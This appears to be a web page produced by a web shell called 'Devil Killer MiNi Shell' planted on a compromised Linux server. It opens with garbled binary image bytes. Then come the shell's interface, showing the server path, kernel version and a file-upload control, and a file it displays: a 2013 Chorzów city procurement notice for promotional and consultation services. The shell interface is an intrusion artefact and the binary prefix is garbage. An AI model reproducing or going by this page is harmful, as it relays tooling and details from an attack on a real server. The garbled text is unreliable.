JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130621/120703-N-2013.html

<p class="kh_header"><b>Chorzów: Działania promocyjne i informacyjne w związku z realizacją projektu pn.:Zintegrowane podejście do problemów obszarów funkcjonalnych na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic.</b><br>
<b>Numer ogłoszenia: 120703 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Chorzów, Biuro Zamówień Publicznych , Rynek 1, 41-500 Chorzów, woj. śląskie, tel. 32 2-411-261...9, faks 32 2-417-458.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chorzow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Działania promocyjne i informacyjne w związku z realizacją projektu pn.:Zintegrowane podejście do problemów obszarów funkcjonalnych na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaplanowanie i przeprowadzenie działań promocyjnych i informacyjnych 
w związku z realizacją projektu pn. Zintegrowane podejście do problemów obszarów funkcjonalnych na przykładzie Chorzowa, Rudy Śląskiej 
i Świętochłowic.
Projekt jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu operacyjnego pomoc techniczna 2007-2013 w ramach konkursu organizowanego przez Ministerstwo Rozwoju Regionalnego na działania wspierające jednostki samorządu terytorialnego w zakresie planowania miejskich obszarów funkcjonalnych.
Zakres i terminy realizacji poszczególnych działań:
A. Zaplanowanie i przygotowanie linii kreacyjnej dla działań promocyjnych wraz z projektem logo i księgi znaku.
Wytyczne:
1.Informacje ogólne o kampanii:
a)Główny cel kampanii: 
-informowanie mieszkańców miast biorących udział w projekcie o obszarze funkcjonalnym, będącym na styku 3 miast zarówno w aspekcie przemysłowym, gospodarczym, społecznym jak i przestrzennym oraz o osiągniętych rezultatach
 i produktach projektu
-zwiększenie świadomości opinii publicznej dotyczącej realizacji projektu
-informowanie samych zainteresowanych-władz i pracowników samorządowych-o realizacji projektu
-stworzenie właściwego wizerunku projektu w oczach mieszkańców miast, które go realizują, gwarantującego utrzymanie komunikacji społecznej w trakcie prac nad projektem
-realizacja celów zawartych w aktualnym Planie komunikacji Programu Operacyjnego Pomocy Technicznej 2007-2013.
b) Grupa docelowa działań promocyjnych i informacyjnych : 
-odbiorcy na szczeblu krajowym-ogół społeczeństwa,
 przedstawiciele rządu w szczególności MRR
-odbiorcy na szczeblu regionalnym i lokalnym-ogół społeczeństwa woj. śląskiego, w szczególności mieszkańcy miast realizujących projekt, media lokalne i regionalne, podmioty zaangażowane w prace nad dokumentem objętym zakresem wniosku np. przedstawiciele  NGO, przedstawiciele przedsiębiorstw i izb gospodarczych, pracownicy samorządów i przedstawiciele miast realizujących projekt
Termin realizacji:
Do: 30.08.2013r.
B. Działania z zakresu public relations. 
Zakres prac:
1.Działania z zakresu public relations muszą być zgodne z przedstawioną linią kreacyjną.
2.Realizacja działań musi być zgodna z przedstawionym scenariuszem.
3.Minimalna liczba działań-3 wydarzenia informacyjne dotyczące postępu 
w realizacji projektu:
a)Konferencja prasowa otwierająca projekt-zwołana do 30 dni od daty rozpoczęcia rzeczowej realizacji projektu, po wcześniejszym rozesłaniu zaproszeń do: przedstawiciele krajowych, regionalnych i lokalnych mediów, przedstawicieli JST realizujących projekt, przedstawicieli MRR, przedstawicieli  NGO, przedstawicieli przedsiębiorstw i izb gospodarczych. Przygotowanie informacji prasowych oraz przekazanie informacji mediom ogólnopolskim i regionalnym na temat konferencji, merytoryczne opracowanie wystąpień prowadzących konferencje, przygotowanie prezentacji mulitmedialnych na potrzeby konferencji prasowej.
b)Seminarium dla podmiotów bezpośrednio zaangażowanych w realizację projektu - przedstawicieli JST realizujących projekt, przedstawicieli  NGO, przedstawicieli przedsiębiorstw i izb gospodarczych, mieszkańców miast realizujących projekt. Przygotowanie informacji prasowych oraz przekazanie informacji mediom ogólnopolskim i regionalnym na temat seminarium do 3 dni roboczych od dnia organizacji seminarium, merytoryczne opracowanie wystąpień prowadzących seminarium, przygotowanie prezentacji mulitmedialnych na potrzeby seminarium.
c)Konferencja prasowa zamykająca projekt-zwołana do 14 dni od daty zakończenia opracowania dokumentów objętych wnioskiem o dofinansowanie po wcześniejszym rozesłaniu zaproszeń do: przedstawiciele krajowych, regionalnych i lokalnych mediów, przedstawicieli JST realizujących projekt, przedstawicieli MRR, przedstawicieli  NGO, przedstawicieli przedsiębiorstw i izb gospodarczych, przedstawicieli firm odpowiedzialnych za realizacje rzeczowego zakresu projektu. Przygotowanie informacji prasowych oraz przekazanie informacji mediom ogólnopolskim i regionalnym na temat konferencji, merytoryczne opracowanie wystąpień prowadzących konferencje, przygotowanie prezentacji mulitmedialnych na potrzeby konferencji prasowej.
4.Wynajem sal na przeprowadzenie wydarzeń z zakresu PR, wybór lokalizacji i dat ich przeprowadzenia nastąpi po uzgodnieniu z Zamawiającym, z zastrzeżeniem, iż konferencja otwierająca projekt odbędzie się w Chorzowie, seminarium w Rudzie Śląskiej, konferencja zamykająca projekt w Świętochłowicach. Dopuszcza się w uzgodnieniu z Zamawiającym przeprowadzenie konferencji w salach, którymi dysponują Urzędy Miast biorących udział w projekcie.
5.Wykonawca roześle  co najmniej 50 zaproszeń pocztą elektroniczną do uczestników każdej z konferencji prasowych oraz około 150 zaproszeń pocztą tradycyjną do uczestników seminarium. Lista zaproszonych na te wydarzenia podlega akceptacji Zamawiającego.
6.W miejscach, w których realizowane będą konferencje, Wykonawca zapewni odpowiednie wyposażenie i materiały umożliwiające realizację przedsięwzięcia zgodnie ze scenariuszem.
7.Wykonawca zapewni catering w formie słodkiego poczęstunku plus kawa, herbata, woda, soki dla przybyłych na 2 konferencje prasowe oraz słodkiego poczęstunku plus kawa, herbata, woda soki plus lunchu dla uczestników seminarium .
8.Wykonawca zapewni wykwalifikowany personel w trakcie realizacji wszystkich konferencji oraz minimum 6 prelegentów w trakcie organizowanego seminarium w porozumieniu z Zamawiającym.
Termin realizacji:
Do 30.01.2015r.
C. Wykonanie gadżetów reklamowych i materiałów informacyjnych. 
Zakres prac:
1. Wykonane gadżety i materiały muszą być zgodne z przedstawioną linią kreacyjną.
2. Wykonanie 300  sztuk długopisów z obudową metalową; 300 sztuk notesów konferencyjnych formatu A5, 50-kartkowych; 300 sztuk teczek projektowych w formacie A5 na notes, długopis i materiały informacyjne; projekt, druk i dystrybucja 
9 000 sztuk ulotek o treści zaakceptowanej przez Zamawiającego, formatu A4 składane do DL, surowiec - papier min. 170 g, w pełnym kolorze; projekt, druk i dystrybucja 3 000 sztuk plakatów w formacie B2, surowiec papier min. 250 g, w pełnym kolorze -  projekt zaakceptowany przez Zamawiającego.
3. 300 drobnych pamiątkowych gadżetów projektowych - wzór zaakceptowany przez Zamawiającego.
4. Wykonanie 300 sztuk pen drive-ów o pojemności co najmniej 2 GB będących nośnikiem elektronicznym przygotowanej przez Wykonawcę prezentacji z materiałami konsultacyjnymi. Typ pen drive-ów-twister, rodzaj obudowy: plastikowy/metalowy, znakowanie: grawer. Zawartość pamięci pen drive-ów zapisana po akceptacji Zamawiającego. 
5. Wszytkie gadżety i materiały informacyjne muszą mieć zamieszczone  logotypy stosowane przy oznakowaniu projektów realizowanych ze środków POPT  2007-2013.
Termin realizacji:
Do 28.03.2014r.
D. Wykonanie i obsługa strony internetowej. 
Zakres prac:
1.Strona internetowa musi być zgodna z przedstawioną linią kreacyjną.
2.Na stronie internetowej Wykonawca zamieści treści zaakceptowane przez Zamawiającego. 
3.Strona ma stanowić punkt odniesienia dla pozostałych działań prowadzonych w ramach kampanii informacyjnej i promocyjnej.
4.Strona internetowa będzie funkcjonować pod domeną zarezerwowaną przez Wykonawcę i na zapewnionym przez niego serwerze. Strona będzie informować  szczegółowo o przebiegu realizacji projektu.
Na stronie publikowane będą w szczególności treści : 
1)opis projektu wraz z  jej głównymi celami, kosztami i spodziewanymi efektami , 
2)informacja o współfinansowaniu projektu
3)zakładka wydarzenia informacyjne
4)zakładka konsultacje społeczne
5)zakładka postęp prac
6)zakładka opis projektu
7)zakładka produkty i rezultaty projektu
8)zakładka aktualności
9)zakładka zespół projektowy
10)fanpage projektu na Facebook-u
5.Wykonawca wykona baner graficzny służący reklamowaniu strony w innych serwisach, w tym na stronach miast pracujących nad projektem.  Baner będzie przekierowywał  na stronę projektową.
6.Wykonawca zadba o jak najlepsze pozycjonowanie strony i zapewni możliwość monitorowania statystyk dziedzin strony dedykowanej przedmiotowej kampanii.
Termin realizacji:
Do 12.08.2013r. winna być wykonana strona internetowa, a jej obsługa powinna trwać do 28.02.2015r.
E. Przeprowadzenie konsultacji społecznych. 
Zakres prac:
1.Działania z zakresu przeprowadzenia konsultacji społecznych muszą być zgodne z przedstawioną linią kreacyjną.
2.Realizacja działań musi być zgodna z przedstawionym scenariuszem.
3.inimalna liczba działań -  9 paneli konsultacyjnych, po 3 w każdym z miast biorących udział w realizacji projektu:
a)Tematyka każdego ze spotkań będzie proponowana ma około 45 dni przed jego organizacją, a każde spotkanie potrwa około 3 godzin.
4.Sposób dystrybucji wykonanych materiałów informacyjnych tj. plakatów i ulotek opisanych w punkcie C podlega uzgodnieniu z Zamawiającym. 
5.Zapewnienie cateringu łącznie dla 300 osób - słodki poczęstunek plus kanapki. 
6.Zapewnienie dwóch wykwalifikowanych moderatorów w trakcie wszystkich 
9 trzygodzinnych spotkań oraz wynajem na potrzeby ich przeprowadzenia.
7.Przeprowadzenie konsultacji on - line - opracowanie arkusza ankietowo/sondażowego dla każdego z 9 spotkań. 
Termin realizacji:
 Pierwsze konsultacje społeczne winny odbyć się w terminie do 30.12.2013 r., natomiast w 2014r. planuje się zorganizowanie dwukrotnie konsultacji -pierwszych w terminie do 30.06.2014r.,a drugie do 28.11.2014r.Powysze terminy dotyczą wszystkich trzech miast.
F.  Regionalne reklamy prasowe.
Zakres prac:
1.Reklamy prasowe muszą być zgodne z przedstawioną linią kreacyjną.
2.Adaptacja projektu reklamy prasowej przygotowanej  przez Wykonawcę do wymogów technicznych nośnika - przygotowanie do druku, zgodnie z wymogami technicznymi wydawców.
3.Reklama prasowa musi być wykonana dla ekspozycji w następującym formacie: 
3.1. 16 modułów - 4x4 ( Dziennik Zachodni) lub równoważne (gwiazdka)
dot. pkt. 3.1.(gwiazdka) - gazeta poświęcona tematyce informacyjnej i społecznej, posiadająca dodatek miejski dla Chorzowa, Rudy Śląskiej i Świętochłowic,, nakład  minimum dla każdego z wymienionych miast Chorzów 8000 egz. , Ruda Śląska 7000 egz. Świętochłowice 3000 egz.
4.Przekazanie reklam do wydawcy, nadzór nad drukiem i emisją.
5.Zamówienie obejmuje zakupu powierzchni reklamowej:
-wybór wydawcy oraz zapewnienie (zakup) ekspozycji reklam (wszelkie ustalenia formalne).
-miejsce ekspozycji reklam prasowych: wszystkie reklamy umieszczone na prawych  stronach, na kolumnach redakcyjnych, pełen kolor 
-format, minimalna ilość oraz data emisji reklam prasowych:
Lp. Rodzaj prasy (gwiazdka)	Ilość/Format
1.Dodatek Dziennika Zachodniego lub równoważne. Rodzaj dodatku (chorzowski, świętochłowicki ,rudzki)  dla każdego artykułu wybrany w uzgodnieniu z Zamawiającym. Maksymalnie 9 artykułów w ramach umowy.	16 modułów (4x4) lub równoważne(gwiazdaka).
6. Wykonawca dostarczy Zamawiającemu do ostatecznej akceptacji reklamy prasowe na 14 dni przed datą pierwszej emisji.
Termin emisji :
a.Do 30.07.2013 r. data  uzależniona od podpisania  umowy z Ministerstwem Rozwoju Regionalnego,
b.Do 30.08.2013r. data uzależniona od otrzymania dokumentu delimitującego obszar funkcjonalny,
c.Do 30.03.2014r. tematyka informacji o programie winna być związana z powstawaniem dokumentów strategicznych,
d.Do 30.08.2014r. tematyka informacji winna  być związana z  programami operacyjnymi ,
e.Do 30.11.2014r. tematyka informacji winna  być związana z wyborem terenów zdegradowanych do zagospodarowania z prezentacja koncepcji,
f.Do 20.02.2015r. tematyka informacji winna być związana z wykonywaniem dokumentacji projektowej zagospodarowania terenów zdegradowanych oraz podsumowaniem samego projektu.
g. W terminie od 01.12.2013r. do 30.08.2014r. winny ukazać się trzy artykuły informujące o projekcie i konsultacjach z nim związanych w zakresie terminu i ich miejsca.
G. Wykonanie tablic informacyjnych i pamiątkowych o projekcie.
1. Wykonawca zaprojektuje i wykona 3 tablice pamiątkowe o projekcie, które zostaną
umieszczone wewnątrz budynków urzędów miast Chorzów, Ruda Śląska i Świętochłowice.
Rozmiar tablic, ich treść oraz materiał z którego zostaną wykonane zostaną ustalone z  Zamawiającym.
2. Wykonawca zaprojektuje i wykona 12 tabliczek informacyjnych o projekcie, które zostaną umieszczone wewnątrz budynków urzędów miast Chorzów, Ruda Śląska i Świętochłowice. Rozmiar tabliczek, ich treść oraz materiał z którego zostaną wykonane zostaną ustalone z  Zamawiającym.
Termin realizacji:
Pkt 1. do 02.08.2013 r. pkt 2. do 28.02.2015r.
H. Ewaluacja działań promocyjnych i informacyjnych wraz z raportem pokamanijnym.
Zakres prac:
1.Wykonawca przedstawi raport pokampanijny w zakresie zadań składających się na realizację przedmiotowej kampanii promocyjnej i informacyjne zawierający: 
a)dokumentację potwierdzającą wykonanie wszystkich usług (w tym dokumentacja fotograficzna, wszystkie egzemplarze publikacji, w których ukazała się informacja o projekcie).
b)raport z wszystkich przeprowadzonych działań, w tym szacunkowe dane o zasięgu (liczbie osób do których dotarły poszczególne przekazy) na podstawie uzyskanych danych.
c)forma wykonania raportu: wydruk zawierający ww. zakres w formacie A4 -6 egzemplarzy oraz wersji  elektronicznej (pliki w formacie pdf., doc i xls)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4). Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże się wykonaniem przynajmniej jednej  usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Poprzez usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia Zamawiający rozumie wykonanie w sposób należyty usługi o wartości co najmniej 80 000,00 zł brutto,  która polegała na zaplanowaniu i przeprowadzeniu działań promocyjnych i informacyjnych w związku z realizacją projektu dofinansowanego ze środków europejskich w ścisłej współpracy z Zamawiającym. 
Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów ( załącznik nr 4 i 5).
Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się  o udzielenie zamówienia w/w warunek spełniają łącznie. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4). Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca zapewni 2 moderatorów odpowiedzialnych za przeprowadzenie konsultacji społecznych w ramach projektu dysponujących potwierdzonym doświadczeniem w prowadzeniu tego typu konsultacji.
Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4 i  6). Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4). Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Stosowne pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zamieszczonego dokumentu. Pełnomocnictwo do reprezentowania danego podmiotu w postępowaniu o udzielenie zamówienia publicznego powinno zostać złożone w oryginale lub kopii poświadczonej notarialnie.
2. Pełnomocnictwo podmiotów występujących wspólnie  wskazujące, że osoba występująca w imieniu tych podmiotów jest upoważniona do ich reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo  powinno zostać złożone w oryginale lub kopii poświadczonej notarialnie.
3.Wykaz informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów art. 4 ust. 4 ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej konkurencji, które wykonawca pragnie zastrzec przed dostępem dla innych uczestników postępowania z podaniem podstawy prawnej.
